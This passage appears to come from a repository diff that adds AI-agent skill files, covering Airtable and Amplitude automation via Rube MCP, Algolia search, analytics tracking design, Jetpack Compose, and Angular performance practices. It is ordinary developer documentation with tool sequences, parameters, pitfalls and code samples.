3. `AIRTABLE_LIST_RECORDS` - List/filter records [Optional]
4. `AIRTABLE_CREATE_RECORD` / `AIRTABLE_CREATE_RECORDS` - Create records [Optional]
5. `AIRTABLE_UPDATE_RECORD` / `AIRTABLE_UPDATE_MULTIPLE_RECORDS` - Update records [Optional]
6. `AIRTABLE_DELETE_RECORD` / `AIRTABLE_DELETE_MULTIPLE_RECORDS` - Delete records [Optional]

**Key parameters**:
- `baseId`: Base ID (starts with 'app', e.g., 'appXXXXXXXXXXXXXX')
- `tableIdOrName`: Table ID (starts with 'tbl') or table name
- `fields`: Object mapping field names to values
- `recordId`: Record ID (starts with 'rec') for updates/deletes
- `filterByFormula`: Airtable formula for filtering
- `typecast`: Set true for automatic type conversion

**Pitfalls**:
- pageSize is capped at 100; uses offset pagination; changing filters between pages can skip/duplicate rows
- CREATE_RECORDS has a hard limit of 10 records per request; chunk larger imports
- Field names are CASE-SENSITIVE and must match the schema exactly
- 422 UNKNOWN_FIELD_NAME when field names are wrong; 403 for permission issues
- INVALID_MULTIPLE_CHOICE_OPTIONS may require typecast=true
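The 10-records-per-request limit above means larger imports must be chunked client-side. A minimal sketch; `create_records` is a hypothetical stand-in for whatever issues the `AIRTABLE_CREATE_RECORDS` call in your client.

```python
def batched(items, size=10):
    """Yield successive chunks of at most `size` items (Airtable's batch limit)."""
    for i in range(0, len(items), size):
        yield items[i:i + size]

def import_records(create_records, records):
    """Create records in batches of 10, collecting the created record IDs."""
    created = []
    for batch in batched(records, 10):
        created.extend(create_records(batch))  # one AIRTABLE_CREATE_RECORDS call
    return created
```

With the ~5 requests/second rate limit noted later in this document, a large import may also need a short sleep between batches.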

### 2. Search and Filter Records

**When to use**: User wants to find specific records using formulas

**Tool sequence**:
1. `AIRTABLE_GET_BASE_SCHEMA` - Verify field names and types [Prerequisite]
2. `AIRTABLE_LIST_RECORDS` - Query with filterByFormula [Required]
3. `AIRTABLE_GET_RECORD` - Get full record details [Optional]

**Key parameters**:
- `filterByFormula`: Airtable formula (e.g., `{Status}='Done'`)
- `sort`: Array of sort objects
- `fields`: Array of field names to return
- `maxRecords`: Max total records across all pages
- `offset`: Pagination cursor from previous response

**Pitfalls**:
- Field names in formulas must be wrapped in `{}` and match the schema exactly
- String values must be quoted: `{Status}='Active'` not `{Status}=Active`
- 422 INVALID_FILTER_BY_FORMULA for bad syntax or non-existent fields
- Airtable rate limit: ~5 requests/second per base; handle 429 with Retry-After

### 3. Manage Fields and Schema

**When to use**: User wants to create or modify table fields

**Tool sequence**:
1. `AIRTABLE_GET_BASE_SCHEMA` - Inspect current schema [Prerequisite]
2. `AIRTABLE_CREATE_FIELD` - Create a new field [Optional]
3. `AIRTABLE_UPDATE_FIELD` - Rename/describe a field [Optional]
4. `AIRTABLE_UPDATE_TABLE` - Update table metadata [Optional]

**Key parameters**:
- `name`: Field name
- `type`: Field type (singleLineText, number, singleSelect, etc.)
- `options`: Type-specific options (choices for select, precision for number)
- `description`: Field description

**Pitfalls**:
- UPDATE_FIELD only changes name/description, NOT type/options; create a replacement field and migrate
- Computed fields (formula, rollup, lookup) cannot be created via API
- 422 when type options are missing or malformed

### 4. Manage Comments

**When to use**: User wants to view or add comments on records

**Tool sequence**:
1. `AIRTABLE_LIST_COMMENTS` - List comments on a record [Required]

**Key parameters**:
- `baseId`: Base ID
- `tableIdOrName`: Table identifier
- `recordId`: Record ID (17 chars, starts with 'rec')
- `pageSize`: Comments per page (max 100)

**Pitfalls**:
- Record IDs must be exactly 17 characters starting with 'rec'

## Common Patterns

### Airtable Formula Syntax

**Comparison**:
- `{Status}='Done'` - Equals
- `{Priority}>1` - Greater than
- `{Name}!=''` - Not empty

**Functions**:
- `AND({A}='x', {B}='y')` - Both conditions
- `OR({A}='x', {A}='y')` - Either condition
- `FIND('test', {Name})>0` - Contains text
- `IS_BEFORE({Due Date}, TODAY())` - Date comparison

**Escape rules**:
- Single quotes in values: double them (`{Name}='John''s Company'`)
|
||||
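The comparison and function forms above compose mechanically, so equality filters can be built in code. A minimal Python sketch (the helper and its keyword-argument field naming are illustrative, not part of any toolkit; quote escaping and field names containing spaces are not handled):

```python
def and_formula(**conditions):
    # Each condition becomes {Field}='value'; multiple conditions are
    # wrapped in AND(...). Field names with spaces or quotes inside
    # values would need extra handling, omitted here for brevity.
    parts = ["{%s}='%s'" % (field, value) for field, value in conditions.items()]
    return parts[0] if len(parts) == 1 else "AND(%s)" % ", ".join(parts)

print(and_formula(Status="Done"))                  # {Status}='Done'
print(and_formula(Status="Active", Priority="1"))  # AND({Status}='Active', {Priority}='1')
```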
### Pagination

- Set `pageSize` (max 100)
- Check response for `offset` string
- Pass `offset` to next request unchanged
- Keep filters/sorts/view stable between pages
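The cursor loop above can be sketched as follows; `list_records` stands in for the AIRTABLE_LIST_RECORDS tool call, and its signature is assumed for illustration:

```python
def fetch_all_records(list_records, base_id, table, page_size=100):
    # Follow the offset cursor until the final page, which omits it.
    records, offset = [], None
    while True:
        page = list_records(baseId=base_id, tableIdOrName=table,
                            pageSize=page_size, offset=offset)
        records.extend(page["records"])
        offset = page.get("offset")  # absent on the last page
        if offset is None:
            return records
```

Keeping filters and sorts identical between calls matters because the cursor is only valid for the original query.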
## Known Pitfalls

**ID Formats**:
- Base IDs: `appXXXXXXXXXXXXXX` (17 chars)
- Table IDs: `tblXXXXXXXXXXXXXX` (17 chars)
- Record IDs: `recXXXXXXXXXXXXXX` (17 chars)
- Field IDs: `fldXXXXXXXXXXXXXX` (17 chars)

**Batch Limits**:
- CREATE_RECORDS: max 10 per request
- UPDATE_MULTIPLE_RECORDS: max 10 per request
- DELETE_MULTIPLE_RECORDS: max 10 per request

## Quick Reference

| Task | Tool Slug | Key Params |
|------|-----------|------------|
| List bases | AIRTABLE_LIST_BASES | (none) |
| Get schema | AIRTABLE_GET_BASE_SCHEMA | baseId |
| List records | AIRTABLE_LIST_RECORDS | baseId, tableIdOrName |
| Get record | AIRTABLE_GET_RECORD | baseId, tableIdOrName, recordId |
| Create record | AIRTABLE_CREATE_RECORD | baseId, tableIdOrName, fields |
| Create records | AIRTABLE_CREATE_RECORDS | baseId, tableIdOrName, records |
| Update record | AIRTABLE_UPDATE_RECORD | baseId, tableIdOrName, recordId, fields |
| Update records | AIRTABLE_UPDATE_MULTIPLE_RECORDS | baseId, tableIdOrName, records |
| Delete record | AIRTABLE_DELETE_RECORD | baseId, tableIdOrName, recordId |
| Create field | AIRTABLE_CREATE_FIELD | baseId, tableIdOrName, name, type |
| Update field | AIRTABLE_UPDATE_FIELD | baseId, tableIdOrName, fieldId |
| Update table | AIRTABLE_UPDATE_TABLE | baseId, tableIdOrName, name |
| List comments | AIRTABLE_LIST_COMMENTS | baseId, tableIdOrName, recordId |
## When to Use

Use this skill to execute the Airtable workflows and actions described above.
packages/llm/skills/algolia-search/SKILL.md (new file, 71 lines)
---
name: algolia-search
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning. Use when adding search functionality with Algolia, InstantSearch, or a search API."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Algolia Search Integration

## Patterns

### React InstantSearch with Hooks

Modern React InstantSearch setup using hooks for type-ahead search.

Uses the react-instantsearch-hooks-web package with the algoliasearch client.
Widgets are components that can be customized with classnames.

Key hooks:
- useSearchBox: Search input handling
- useHits: Access search results
- useRefinementList: Facet filtering
- usePagination: Result pagination
- useInstantSearch: Full state access

### Next.js Server-Side Rendering

SSR integration for Next.js with the react-instantsearch-nextjs package.

Use <InstantSearchNext> instead of <InstantSearch> for SSR.
Supports both the Pages Router and the App Router (experimental).

Key considerations:
- Set dynamic = 'force-dynamic' for fresh results
- Handle URL synchronization with the routing prop
- Use getServerState for initial state

### Data Synchronization and Indexing

Indexing strategies for keeping Algolia in sync with your data.

Three main approaches:
1. Full Reindexing - Replace the entire index (expensive)
2. Full Record Updates - Replace individual records
3. Partial Updates - Update specific attributes only

Best practices:
- Batch records (ideal: 10 MB, 1K-10K records per batch)
- Use incremental updates when possible
- Use partialUpdateObjects for attribute-only changes
- Avoid deleteBy (computationally expensive)
## When to Use

Use this skill to implement or tune Algolia search using the patterns described above.
packages/llm/skills/amplitude-automation/SKILL.md (new file, 220 lines)
---
name: amplitude-automation
description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Amplitude Automation via Rube MCP

Automate Amplitude product analytics through Composio's Amplitude toolkit via Rube MCP.

## Prerequisites

- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
- Active Amplitude connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas

## Setup

**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed; just add the endpoint and it works.

1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
3. If the connection is not ACTIVE, follow the returned auth link to complete Amplitude authentication
4. Confirm connection status shows ACTIVE before running any workflows

## Core Workflows

### 1. Send Events

**When to use**: User wants to track events or send event data to Amplitude

**Tool sequence**:
1. `AMPLITUDE_SEND_EVENTS` - Send one or more events to Amplitude [Required]

**Key parameters**:
- `events`: Array of event objects, each containing:
  - `event_type`: Name of the event (e.g., 'page_view', 'purchase')
  - `user_id`: Unique user identifier (required if no `device_id`)
  - `device_id`: Device identifier (required if no `user_id`)
  - `event_properties`: Object with custom event properties
  - `user_properties`: Object with user properties to set
  - `time`: Event timestamp in milliseconds since epoch

**Pitfalls**:
- At least one of `user_id` or `device_id` is required per event
- `event_type` is required for every event; cannot be empty
- `time` must be in milliseconds (13-digit epoch), not seconds
- Batch limit applies; check schema for maximum events per request
- Events are processed asynchronously; a successful API response does not mean data is immediately queryable
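Since a 10-digit seconds value would be read as a date in 1970, it is worth converting timestamps explicitly. A small sketch (plain Python; the function name is ours, not a toolkit call):

```python
import time
from datetime import datetime, timezone

def epoch_ms(dt=None):
    # Amplitude's `time` field expects milliseconds since epoch
    # (13 digits for current dates); default to "now" when no
    # datetime is given.
    if dt is None:
        return int(time.time() * 1000)
    return int(dt.timestamp() * 1000)

# 2026-02-27 00:00:00 UTC -> 1772150400000 (13 digits)
print(epoch_ms(datetime(2026, 2, 27, tzinfo=timezone.utc)))
```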
### 2. Get User Activity

**When to use**: User wants to view event history for a specific user

**Tool sequence**:
1. `AMPLITUDE_FIND_USER` - Find user by ID or property [Prerequisite]
2. `AMPLITUDE_GET_USER_ACTIVITY` - Retrieve user's event stream [Required]

**Key parameters**:
- `user`: Amplitude internal user ID (from FIND_USER)
- `offset`: Pagination offset for event list
- `limit`: Maximum number of events to return

**Pitfalls**:
- `user` parameter requires Amplitude's internal user ID, NOT your application's user_id
- Must call FIND_USER first to resolve your user_id to Amplitude's internal ID
- Activity is returned in reverse chronological order by default
- Large activity histories require pagination via `offset`

### 3. Find and Identify Users

**When to use**: User wants to look up users or set user properties

**Tool sequence**:
1. `AMPLITUDE_FIND_USER` - Search for a user by various identifiers [Required]
2. `AMPLITUDE_IDENTIFY` - Set or update user properties [Optional]

**Key parameters**:
- For FIND_USER:
  - `user`: Search term (user_id, email, or Amplitude ID)
- For IDENTIFY:
  - `user_id`: Your application's user identifier
  - `device_id`: Device identifier (alternative to user_id)
  - `user_properties`: Object with `$set`, `$unset`, `$add`, `$append` operations

**Pitfalls**:
- FIND_USER searches across user_id, device_id, and Amplitude ID
- IDENTIFY uses special property operations (`$set`, `$unset`, `$add`, `$append`)
- `$set` overwrites existing values; `$setOnce` only sets if not already set
- At least one of `user_id` or `device_id` is required for IDENTIFY
- User property changes are eventually consistent; not immediate

### 4. Manage Cohorts

**When to use**: User wants to list cohorts, view cohort details, or update cohort membership

**Tool sequence**:
1. `AMPLITUDE_LIST_COHORTS` - List all saved cohorts [Required]
2. `AMPLITUDE_GET_COHORT` - Get detailed cohort information [Optional]
3. `AMPLITUDE_UPDATE_COHORT_MEMBERSHIP` - Add/remove users from a cohort [Optional]
4. `AMPLITUDE_CHECK_COHORT_STATUS` - Check async cohort operation status [Optional]

**Key parameters**:
- For LIST_COHORTS: No required parameters
- For GET_COHORT: `cohort_id` (from list results)
- For UPDATE_COHORT_MEMBERSHIP:
  - `cohort_id`: Target cohort ID
  - `memberships`: Object with `add` and/or `remove` arrays of user IDs
- For CHECK_COHORT_STATUS: `request_id` from update response

**Pitfalls**:
- Cohort IDs are required for all cohort-specific operations
- UPDATE_COHORT_MEMBERSHIP is asynchronous; use CHECK_COHORT_STATUS to verify
- `request_id` from the update response is needed for status checking
- Maximum membership changes per request may be limited; chunk large updates
- Only behavioral cohorts support API membership updates

### 5. Browse Event Categories

**When to use**: User wants to discover available event types and categories in Amplitude

**Tool sequence**:
1. `AMPLITUDE_GET_EVENT_CATEGORIES` - List all event categories [Required]

**Key parameters**:
- No required parameters; returns all configured event categories

**Pitfalls**:
- Categories are configured in Amplitude UI; API provides read access
- Event names within categories are case-sensitive
- Use these categories to validate event_type values before sending events

## Common Patterns

### ID Resolution

**Application user_id -> Amplitude internal ID**:
```
1. Call AMPLITUDE_FIND_USER with user=your_user_id
2. Extract Amplitude's internal user ID from response
3. Use internal ID for GET_USER_ACTIVITY
```

**Cohort name -> Cohort ID**:
```
1. Call AMPLITUDE_LIST_COHORTS
2. Find cohort by name in results
3. Extract id for cohort operations
```

### User Property Operations

Amplitude IDENTIFY supports these property operations:
- `$set`: Set property value (overwrites existing)
- `$setOnce`: Set only if property not already set
- `$add`: Increment numeric property
- `$append`: Append to list property
- `$unset`: Remove property entirely

Example structure:
```json
{
  "user_properties": {
    "$set": {"plan": "premium", "company": "Acme"},
    "$add": {"login_count": 1}
  }
}
```

### Async Operation Pattern

For cohort membership updates:
```
1. Call AMPLITUDE_UPDATE_COHORT_MEMBERSHIP -> get request_id
2. Call AMPLITUDE_CHECK_COHORT_STATUS with request_id
3. Repeat step 2 until status is 'complete' or 'error'
```
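Such a polling loop can be sketched like this; `check_status` stands in for the AMPLITUDE_CHECK_COHORT_STATUS call, and the exact status strings should be confirmed against the schema from RUBE_SEARCH_TOOLS:

```python
import time

def wait_for_cohort(check_status, request_id, poll_seconds=2.0, max_attempts=30):
    # Poll until the async membership update settles; both terminal
    # states are returned so the caller can inspect errors.
    for _ in range(max_attempts):
        status = check_status(request_id=request_id)["status"]
        if status in ("complete", "error"):
            return status
        time.sleep(poll_seconds)
    raise TimeoutError("cohort update %s still pending" % request_id)
```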
## Known Pitfalls

**User IDs**:
- Amplitude has its own internal user IDs separate from your application's
- FIND_USER resolves your IDs to Amplitude's internal IDs
- GET_USER_ACTIVITY requires Amplitude's internal ID, not your user_id

**Event Timestamps**:
- Must be in milliseconds since epoch (13 digits)
- Seconds (10 digits) will be interpreted as very old dates
- Omitting timestamp uses server receive time

**Rate Limits**:
- Event ingestion has throughput limits per project
- Batch events where possible to reduce API calls
- Cohort membership updates have async processing limits

**Response Parsing**:
- Response data may be nested under `data` key
- User activity returns events in reverse chronological order
- Cohort lists may include archived cohorts; check status field
- Parse defensively with fallbacks for optional fields

## Quick Reference

| Task | Tool Slug | Key Params |
|------|-----------|------------|
| Send events | AMPLITUDE_SEND_EVENTS | events (array) |
| Find user | AMPLITUDE_FIND_USER | user |
| Get user activity | AMPLITUDE_GET_USER_ACTIVITY | user, offset, limit |
| Identify user | AMPLITUDE_IDENTIFY | user_id, user_properties |
| List cohorts | AMPLITUDE_LIST_COHORTS | (none) |
| Get cohort | AMPLITUDE_GET_COHORT | cohort_id |
| Update cohort members | AMPLITUDE_UPDATE_COHORT_MEMBERSHIP | cohort_id, memberships |
| Check cohort status | AMPLITUDE_CHECK_COHORT_STATUS | request_id |
| List event categories | AMPLITUDE_GET_EVENT_CATEGORIES | (none) |
## When to Use

Use this skill to execute the Amplitude workflows described above.
packages/llm/skills/analytics-tracking/SKILL.md (new file, 405 lines)
---
name: analytics-tracking
description: Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data.
risk: unknown
source: community
date_added: '2026-02-27'
---

# Analytics Tracking & Measurement Strategy

You are an expert in **analytics implementation and measurement design**.
Your goal is to ensure tracking produces **trustworthy signals that directly support decisions** across marketing, product, and growth.

You do **not** track everything.
You do **not** optimize dashboards without fixing instrumentation.
You do **not** treat GA4 numbers as truth unless validated.

---

## Phase 0: Measurement Readiness & Signal Quality Index (Required)

Before adding or changing tracking, calculate the **Measurement Readiness & Signal Quality Index**.

### Purpose

This index answers:

> **Can this analytics setup produce reliable, decision-grade insights?**

It prevents:

* event sprawl
* vanity tracking
* misleading conversion data
* false confidence in broken analytics

---

## 🔢 Measurement Readiness & Signal Quality Index

### Total Score: **0–100**

This is a **diagnostic score**, not a performance KPI.

---

### Scoring Categories & Weights

| Category | Weight |
| ----------------------------- | ------- |
| Decision Alignment | 25 |
| Event Model Clarity | 20 |
| Data Accuracy & Integrity | 20 |
| Conversion Definition Quality | 15 |
| Attribution & Context | 10 |
| Governance & Maintenance | 10 |
| **Total** | **100** |

---

### Category Definitions

#### 1. Decision Alignment (0–25)

* Clear business questions defined
* Each tracked event maps to a decision
* No events tracked “just in case”

---

#### 2. Event Model Clarity (0–20)

* Events represent **meaningful actions**
* Naming conventions are consistent
* Properties carry context, not noise

---

#### 3. Data Accuracy & Integrity (0–20)

* Events fire reliably
* No duplication or inflation
* Values are correct and complete
* Cross-browser and mobile validated

---

#### 4. Conversion Definition Quality (0–15)

* Conversions represent real success
* Conversion counting is intentional
* Funnel stages are distinguishable

---

#### 5. Attribution & Context (0–10)

* UTMs are consistent and complete
* Traffic source context is preserved
* Cross-domain / cross-device handled appropriately

---

#### 6. Governance & Maintenance (0–10)

* Tracking is documented
* Ownership is clear
* Changes are versioned and monitored

---

### Readiness Bands (Required)

| Score | Verdict | Interpretation |
| ------ | --------------------- | --------------------------------- |
| 85–100 | **Measurement-Ready** | Safe to optimize and experiment |
| 70–84 | **Usable with Gaps** | Fix issues before major decisions |
| 55–69 | **Unreliable** | Data cannot be trusted yet |
| <55 | **Broken** | Do not act on this data |

If verdict is **Broken**, stop and recommend remediation first.
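The weights and bands above can be tallied mechanically. A sketch (the category keys are our shorthand for the table rows):

```python
WEIGHTS = {
    "decision_alignment": 25,
    "event_model_clarity": 20,
    "data_accuracy": 20,
    "conversion_quality": 15,
    "attribution_context": 10,
    "governance": 10,
}

def readiness_verdict(scores):
    # Sum the six category scores (each capped at its weight) and map
    # the 0-100 total onto the readiness bands.
    total = sum(min(scores.get(k, 0), w) for k, w in WEIGHTS.items())
    if total >= 85:
        band = "Measurement-Ready"
    elif total >= 70:
        band = "Usable with Gaps"
    elif total >= 55:
        band = "Unreliable"
    else:
        band = "Broken"
    return total, band

print(readiness_verdict({"decision_alignment": 20, "event_model_clarity": 15,
                         "data_accuracy": 10, "conversion_quality": 10,
                         "attribution_context": 5}))  # (60, 'Unreliable')
```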
---

## Phase 1: Context & Decision Definition

(Proceed only after scoring)

### 1. Business Context

* What decisions will this data inform?
* Who uses the data (marketing, product, leadership)?
* What actions will be taken based on insights?

---

### 2. Current State

* Tools in use (GA4, GTM, Mixpanel, Amplitude, etc.)
* Existing events and conversions
* Known issues or distrust in data

---

### 3. Technical & Compliance Context

* Tech stack and rendering model
* Who implements and maintains tracking
* Privacy, consent, and regulatory constraints

---

## Core Principles (Non-Negotiable)

### 1. Track for Decisions, Not Curiosity

If no decision depends on it, **don’t track it**.

---

### 2. Start with Questions, Work Backwards

Define:

* What you need to know
* What action you’ll take
* What signal proves it

Then design events.

---

### 3. Events Represent Meaningful State Changes

Avoid:

* cosmetic clicks
* redundant events
* UI noise

Prefer:

* intent
* completion
* commitment

---

### 4. Data Quality Beats Volume

Fewer accurate events > many unreliable ones.

---

## Event Model Design

### Event Taxonomy

**Navigation / Exposure**

* page_view (enhanced)
* content_viewed
* pricing_viewed

**Intent Signals**

* cta_clicked
* form_started
* demo_requested

**Completion Signals**

* signup_completed
* purchase_completed
* subscription_changed

**System / State Changes**

* onboarding_completed
* feature_activated
* error_occurred

---

### Event Naming Conventions

**Recommended pattern:**

```
object_action[_context]
```

Examples:

* signup_completed
* pricing_viewed
* cta_hero_clicked
* onboarding_step_completed

Rules:

* lowercase
* underscores
* no spaces
* no ambiguity
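These rules are easy to enforce automatically. A validator sketch (the regex is our reading of the rules; it requires at least two lowercase segments and, for instance, does not allow digits):

```python
import re

# lowercase words joined by underscores: object_action[_context]
EVENT_NAME = re.compile(r"^[a-z]+(_[a-z]+)+$")

def valid_event_name(name):
    return bool(EVENT_NAME.match(name))

print(valid_event_name("signup_completed"))   # True
print(valid_event_name("Signup Completed"))   # False
print(valid_event_name("pricingViewed"))      # False
```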
---

### Event Properties (Context, Not Noise)

Include:

* where (page, section)
* who (user_type, plan)
* how (method, variant)

Avoid:

* PII
* free-text fields
* duplicated auto-properties

---

## Conversion Strategy

### What Qualifies as a Conversion

A conversion must represent:

* real value
* completed intent
* irreversible progress

Examples:

* signup_completed
* purchase_completed
* demo_booked

Not conversions:

* page views
* button clicks
* form starts

---

### Conversion Counting Rules

* Once per session vs every occurrence
* Explicitly documented
* Consistent across tools

---

## GA4 & GTM (Implementation Guidance)

*(Tool-specific, but optional)*

* Prefer GA4 recommended events
* Use GTM for orchestration, not logic
* Push clean dataLayer events
* Avoid multiple containers
* Version every publish

---

## UTM & Attribution Discipline

### UTM Rules

* lowercase only
* consistent separators
* documented centrally
* never overwritten client-side

UTMs exist to **explain performance**, not inflate numbers.
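Never overwriting client-side still leaves room for normalization at ingestion. A stdlib-only sketch that lowercases just the utm_* values so 'Email' and 'email' are not counted as two sources:

```python
from urllib.parse import urlencode, urlsplit, parse_qsl, urlunsplit

def normalize_utms(url):
    # Lowercase utm_* parameter values; leave other params untouched.
    parts = urlsplit(url)
    query = [
        (k, v.lower() if k.startswith("utm_") else v)
        for k, v in parse_qsl(parts.query)
    ]
    return urlunsplit(parts._replace(query=urlencode(query)))

print(normalize_utms("https://x.com/p?utm_source=Email&id=AbC"))
# https://x.com/p?utm_source=email&id=AbC
```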
---

## Validation & Debugging

### Required Validation

* Real-time verification
* Duplicate detection
* Cross-browser testing
* Mobile testing
* Consent-state testing

### Common Failure Modes

* double firing
* missing properties
* broken attribution
* PII leakage
* inflated conversions

---

## Privacy & Compliance

* Consent before tracking where required
* Data minimization
* User deletion support
* Retention policies reviewed

Analytics that violate trust undermine optimization.

---

## Output Format (Required)

### Measurement Strategy Summary

* Measurement Readiness Index score + verdict
* Key risks and gaps
* Recommended remediation order

---

### Tracking Plan

| Event | Description | Properties | Trigger | Decision Supported |
| ----- | ----------- | ---------- | ------- | ------------------ |

---

### Conversions

| Conversion | Event | Counting | Used By |
| ---------- | ----- | -------- | ------- |

---

### Implementation Notes

* Tool-specific setup
* Ownership
* Validation steps

---

## Questions to Ask (If Needed)

1. What decisions depend on this data?
2. Which metrics are currently trusted or distrusted?
3. Who owns analytics long term?
4. What compliance constraints apply?
5. What tools are already in place?

---

## Related Skills

* **page-cro** – Uses this data for optimization
* **ab-test-setup** – Requires clean conversions
* **seo-audit** – Organic performance analysis
* **programmatic-seo** – Scale requires reliable signals

---
## When to Use

Use this skill to design or audit analytics tracking following the workflow described above.
packages/llm/skills/android-jetpack-compose-expert/SKILL.md (new file, 153 lines)
---
name: android-jetpack-compose-expert
description: "Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3."
risk: safe
source: community
date_added: "2026-02-27"
---

# Android Jetpack Compose Expert

## Overview

A comprehensive guide for building production-quality Android applications using Jetpack Compose. This skill covers architectural patterns, state management with ViewModels, navigation type-safety, and performance optimization techniques.

## When to Use This Skill

- Use when starting a new Android project with Jetpack Compose.
- Use when migrating legacy XML layouts to Compose.
- Use when implementing complex UI state management and side effects.
- Use when optimizing Compose performance (recomposition counts, stability).
- Use when setting up Navigation with type safety.

## Step-by-Step Guide

### 1. Project Setup & Dependencies

Ensure your `libs.versions.toml` includes the necessary Compose BOM and libraries.

```toml
[versions]
composeBom = "2024.02.01"
activityCompose = "1.8.2"

[libraries]
androidx-compose-bom = { group = "androidx.compose", name = "compose-bom", version.ref = "composeBom" }
androidx-ui = { group = "androidx.compose.ui", name = "ui" }
androidx-ui-graphics = { group = "androidx.compose.ui", name = "ui-graphics" }
androidx-ui-tooling-preview = { group = "androidx.compose.ui", name = "ui-tooling-preview" }
androidx-material3 = { group = "androidx.compose.material3", name = "material3" }
androidx-activity-compose = { group = "androidx.activity", name = "activity-compose", version.ref = "activityCompose" }
```
### 2. State Management Pattern (MVI/MVVM)

Use `ViewModel` with `StateFlow` to expose UI state. Avoid exposing `MutableStateFlow`.

```kotlin
// UI State Definition
data class UserUiState(
    val isLoading: Boolean = false,
    val user: User? = null,
    val error: String? = null
)

// ViewModel (annotated for Hilt so hiltViewModel() can provide it)
@HiltViewModel
class UserViewModel @Inject constructor(
    private val userRepository: UserRepository
) : ViewModel() {

    private val _uiState = MutableStateFlow(UserUiState())
    val uiState: StateFlow<UserUiState> = _uiState.asStateFlow()

    fun loadUser() {
        viewModelScope.launch {
            _uiState.update { it.copy(isLoading = true) }
            try {
                val user = userRepository.getUser()
                _uiState.update { it.copy(user = user, isLoading = false) }
            } catch (e: Exception) {
                _uiState.update { it.copy(error = e.message, isLoading = false) }
            }
        }
    }
}
```

### 3. Creating the Screen Composable

Consume the state in a "Screen" composable and pass data down to stateless components.

```kotlin
@Composable
fun UserScreen(
    viewModel: UserViewModel = hiltViewModel()
) {
    val uiState by viewModel.uiState.collectAsStateWithLifecycle()

    UserContent(
        uiState = uiState,
        onRetry = viewModel::loadUser
    )
}

@Composable
fun UserContent(
    uiState: UserUiState,
    onRetry: () -> Unit
) {
    Scaffold { padding ->
        Box(modifier = Modifier.padding(padding)) {
            when {
                uiState.isLoading -> CircularProgressIndicator()
                uiState.error != null -> ErrorView(uiState.error, onRetry)
                uiState.user != null -> UserProfile(uiState.user)
            }
        }
    }
}
```

## Examples

### Example 1: Type-Safe Navigation

Using the new Navigation Compose Type Safety (available in recent versions).

```kotlin
// Define Destinations
@Serializable
object Home

@Serializable
data class Profile(val userId: String)

// Setup NavHost
@Composable
fun AppNavHost(navController: NavHostController) {
    NavHost(navController, startDestination = Home) {
        composable<Home> {
            HomeScreen(onNavigateToProfile = { id ->
                navController.navigate(Profile(userId = id))
            })
        }
        composable<Profile> { backStackEntry ->
            val profile: Profile = backStackEntry.toRoute()
            ProfileScreen(userId = profile.userId)
        }
    }
}
```

## Best Practices

- ✅ **Do:** Use `remember` and `derivedStateOf` to minimize unnecessary calculations during recomposition.
- ✅ **Do:** Mark data classes used in UI state as `@Immutable` or `@Stable` if they contain `List` or other unstable types to enable smart recomposition skipping.
- ✅ **Do:** Use `LaunchedEffect` for one-off side effects (like showing a Snackbar) triggered by state changes.
- ❌ **Don't:** Perform expensive operations (like sorting a list) directly inside the Composable function body without `remember`.
- ❌ **Don't:** Pass `ViewModel` instances down to child components. Pass only the data (state) and lambda callbacks (events).

## Troubleshooting

**Problem:** Infinite recomposition loop.
**Solution:** Check if you are creating new object instances (like `List` or `Modifier`) inside the composition without `remember`, or if you are updating state inside the composition phase instead of a side effect or callback. Use the Layout Inspector to debug recomposition counts.
packages/llm/skills/angular-best-practices/README.md (new file, 58 lines)
# Angular Best Practices
|
||||
|
||||
Performance optimization and best practices for Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill provides prioritized performance guidelines across:
|
||||
|
||||
- **Change Detection** - OnPush strategy, Signals, Zoneless apps
|
||||
- **Async Operations** - Avoiding waterfalls, SSR preloading
|
||||
- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
|
||||
- **Rendering Performance** - TrackBy, virtual scrolling, CDK
|
||||
- **SSR & Hydration** - Server-side rendering patterns
|
||||
- **Template Optimization** - Structural directives, pipe memoization
|
||||
- **State Management** - Efficient reactivity patterns
|
||||
- **Memory Management** - Subscription cleanup, detached refs
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file is organized by priority:
|
||||
|
||||
1. **Critical Priority** - Largest performance gains (change detection, async)
|
||||
2. **High Priority** - Significant impact (bundles, rendering)
|
||||
3. **Medium Priority** - Noticeable improvements (SSR, templates)
|
||||
4. **Low Priority** - Incremental gains (memory, cleanup)
|
||||
|
||||
Each rule includes:
|
||||
|
||||
- ❌ **WRONG** - What not to do
|
||||
- ✅ **CORRECT** - Recommended pattern
|
||||
- 📝 **Why** - Explanation of the impact
|
||||
|
||||
## Quick Reference Checklist
|
||||
|
||||
**For New Components:**
|
||||
|
||||
- [ ] Using `ChangeDetectionStrategy.OnPush`
|
||||
- [ ] Using Signals for reactive state
|
||||
- [ ] Using `@defer` for non-critical content
|
||||
- [ ] Using `trackBy` for `*ngFor` loops
|
||||
- [ ] No subscriptions without cleanup
|
||||
|
||||
**For Performance Reviews:**
|
||||
|
||||
- [ ] No async waterfalls (parallel data fetching)
|
||||
- [ ] Routes lazy-loaded
|
||||
- [ ] Large libraries code-split
|
||||
- [ ] Images use `NgOptimizedImage`
|
||||
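As an illustration of the last checklist item, `NgOptimizedImage` (from `@angular/common`) requires explicit dimensions to prevent layout shift and supports priority loading. A minimal sketch; the component and asset path are hypothetical:

```typescript
import { Component } from "@angular/core";
import { NgOptimizedImage } from "@angular/common";

@Component({
  selector: "app-hero-banner",
  standalone: true,
  imports: [NgOptimizedImage],
  template: `
    <!-- ngSrc (instead of src) enables the directive's optimizations -->
    <img ngSrc="/assets/hero.webp" width="1200" height="400" priority />
  `,
})
export class HeroBannerComponent {}
```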

## Version

Current version: 1.0.0 (February 2026)

## References

